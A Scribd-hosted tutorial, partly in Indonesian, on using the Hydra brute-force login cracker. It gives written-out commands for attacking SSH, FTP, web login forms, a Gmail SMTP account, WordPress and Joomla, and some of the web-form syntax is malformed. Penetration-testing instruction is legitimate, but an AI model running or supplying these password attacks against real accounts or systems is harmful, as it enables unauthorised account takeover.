Scribd Logo
Upload

Welcome to Scribd!

  • Tutorial Penggunaaan Crack Password

    Uploaded by

    Galaksi Matahari Biru
    16 views4 pages
    tes

    Copyright

    © © All Rights Reserved

    Available Formats

    DOCX, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    tes

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    16 views4 pages

    Tutorial Penggunaaan Crack Password

    Uploaded by

    Galaksi Matahari Biru
    tes

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 4

    Tutorial Penggunaaan Crack Password

    Hydra

    Hydra is the brute forceing toolkit & called a login cracker. This tool is made for penetration tester
    and ethical hackers.

    It supports: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST,
    HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle
    Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT),
    SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2),
    Telnet, VMware-Auth, VNC and XMPP.

    hydra -l username -p passwordlist.txt target

    The username can be a single user name, such as "admin" or username list, passwordlist is usually any
    text file that contains potential passwords, and target can be an IP address and port, or it can be a
    specific web form field.

    Contoh ssh:

    Lakukan percobaan di komputer(Localhost)


    ~# hydra -l root -P 500-worst-passwords.txt 10.10.10.10 ssh

    Contoh ftp:

    root@kali:~# hydra -t 1 -l admin -P /root/Desktop/password.lst -vV 192.168.1.1


    ftp

    For example: ‘-l’ or ‘-P’ etc. And then right after a space the string
    or the value. The various parameters are given below :

    ► -l = The username

    ► -L = List of usernames (If you don’t know the login).

    ► -p = The password

    ► -P = The directory for the wordlists

    ► -vV – The verbose mode. This mode shows you every login attempt hydra
    tries.

    ► -s – We specify the port on which we’re running our attack.


    ► -x – For brute-force parameters generation. We define our charset and
    minimum & maximum length of it.

    ► -R – Restores a previously aborted session of an attack.

    ► -e ns – Checks for blank or no password fields.

    Website

    /hydra -L /root/usernames.txt

    -P /root/HugeDB.txt

    -e ns -vV -s 80

    website.com http-post-form
    “/login.php&username=^USER^&password=^PASS^

    (That’s all supposed to go within one command, one line)

    Gmail

    hydra -l yourmail@gmail.com -P yourwordlist.txt -s 465 -S -v -V -t 1


    smtp.gmail.com smtp

    Wordpress

    hydra -L lists/usrname.txt -P lists/pass.txt localhost -V http-form-post

    '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log
    In&testcookie=1:S=Location'

    Joomla

    hydra <ip-host> http-post-form


    “/administrator:username=^USER^&passwd=^PASS^:Log in” -L USER -P PASS

    You might also like